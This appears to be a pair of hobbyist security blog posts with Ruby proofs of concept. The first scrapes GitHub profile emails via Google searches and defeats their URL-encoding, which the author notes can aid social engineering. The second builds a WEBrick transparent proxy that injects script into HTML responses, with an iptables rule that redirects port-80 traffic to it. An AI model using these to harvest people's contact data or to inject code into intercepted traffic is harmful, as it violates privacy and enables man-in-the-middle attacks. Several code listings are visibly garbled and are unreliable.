Github Email Crawler
Small proof of concept to crawl several emails using Google, ruby and some Sunday coding.
One of the things that Github discloses ( if provided ) is the email addresses. Short of that, it also discloses information such as Full Name, website, Location, etc, as it is show on the image below.
Taking advantage of this and the fact that it is stored on the crawled page by Google it is really simple to search for Profile pages in github using a string close to the one shown:
site:github.com intitle:Profile
After that it is just a matter of retrieving each profile URL using a really simple regex like.
response.body.scan(/"http:\/\/github.com\/(.*)"/)
which should be followed by doing a get request of each and every profile. It is relevant to mention that some emails address are encoded to prevent simple bots from crawling email addresses, but it is easily to bypass, since it is only encoded using a url-encoding method.
text.gsub!(/eval\(decodeURIComponent\('.*'\)\)/) { |a| CGI.unescape(a) }
Once we have the profile we can start gathering emails from the github.com site. Even though this is just a simple proof of concept there are plenty of information that could be gathered to aid different types of social-engineering attacks.
Anyways, after a few minutes I had a really crapy and simple script that will crawl Google and find all Github.com Profiles in order to obtain all the disclosed email addresses.
( As I previously mentioned this could be expanded to harvest much more profile-able data. )
Enjoy !
WEBrick Transparent Proxy + code injection.
I've search and search, asked Google, yahoo, sarasa search, and pretty much everyone else I know. Everything was incomplete, not well explain or not in subject at all. After many days of looking I found a japanese site, which I did not understood much of it but after I google translated I was able to check some code and learn how to capture the response body messages.
NOTE: As a word of advice, it is worth mentioning that this situation where only the Japanese have ruby code, has happened several times before with weird and undocumented methods or libraries. So it's always good to look in google.jp for ruby code
You may say why to even bother to do a Transparent proxy in ruby which is able to inject code, well maybe the answer is just because I want to see if I can do it.
I decided to do my PoC with the native library WEBrick, a simple and light HTTPserver among other things.
Simple Proxy :
The first thing I usually do is check the official site and Rdoc for the lib. Unluckily, I was only able to find how to do a normal proxy. and work with the request.
require 'webrick'
require 'webrick/httproxy'
WEBrick::HTTPProxyServer.new
ort 8080,
:BindAddress => '0.0.0.0',
:ServerType => Thread,
:RequestCallback => Proc.new {|req,res| puts "#{req.unparsed_uri}" }
a.start
Simple Proxy server.
Fixing the URI :
With this we can setup Firefox, safari or any other web browser to use the proxy on localhost:8080 and Eureka, we have a proxy that will printout the unparsed_uri for our request.
This in theory works like a charm , but wait. If you see the request Firefox is doing the following
GET http://www.sarasa.com/ HTTP/1.1Browser request using a proxy server.
...
Normal the brower when requesting a page , will use HTTP/1.1 and use the header "Host" to specified the url and just connect using a:
GET / HTTP/1.1Browser request.
Host: www.sarasa.com
Having said this, here is the first wall I encounter. This is something that was undocumented: how do we turn our proxy into a transparent proxy?
The answer is simple. let's modified our code and change the request. All the information is there we just have to re-write it to fit our need.
Before, we start we should know that our req is of type WEBrick::HTTPRequest. Knowing this we will do a little monkey patching to add a new method to the class and
require 'webrick'
require 'webrick/httproxy'
class WEBrick::HTTPRequest
def update_uri(uri)
@unparsed_uri = uri
@request_uri = parse_uri(uri)
end
end
req_call = Proc.new do |req,res|
req.update_uri()
puts "#{req.unparsed_uri}" }
end
WEBrick::HTTPProxyServer.new
ort 8080,
:BindAddress => '0.0.0.0',
:ServerType => Thread,
:RequestCallback => req_call
a.startTransparent Proxy Server.
Injecting:
Well, a transparent proxy is cool , but we could do the same with squid or some other product. Let's take it a little further and make it more interesting by adding an inject_payload to our response class.
require 'webrick'
require 'webrick/httproxy'
class WEBrick::HTTPRequest
def update_uri(uri)
@unparsed_uri = uri
@request_uri = parse_uri(uri)
end
end
class WEBrick::HTTPResponse
def inject_payload(string)
if @content_type =~ /html/
@body.gsub!( /<\/body>/ , "<script>#{string}</script></body>") # this is just
end
end
end
req_call = Proc.new do |req,res|
req.update_uri()
puts "#{req.unparsed_uri}" }
end
res_call = Proc.new do |req,res|
res.inject_payload("alert(\"P0wned\");")
end
WEBrick::HTTPProxyServer.new
ort 8080,
:BindAddress => '0.0.0.0',
:ServerType => Thread,
:RequestCallback => req_call
roxyContentHandler => res_call
a.startInjectable Transparent Proxy server.
Last but not least :
Well, there is one more thing , but this is more at an operating system level we know want to reroute everything that is coming from the port 80 to port 8080 where our transparent proxy is listening. The following example shows a possible way to redirect HTTP traffic assuming that is coming from the interface eth0 and the proxy is listening on port 8080.
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
Now we have a transparent proxy in our hands capable of injecting code into their request.
Enjoy.
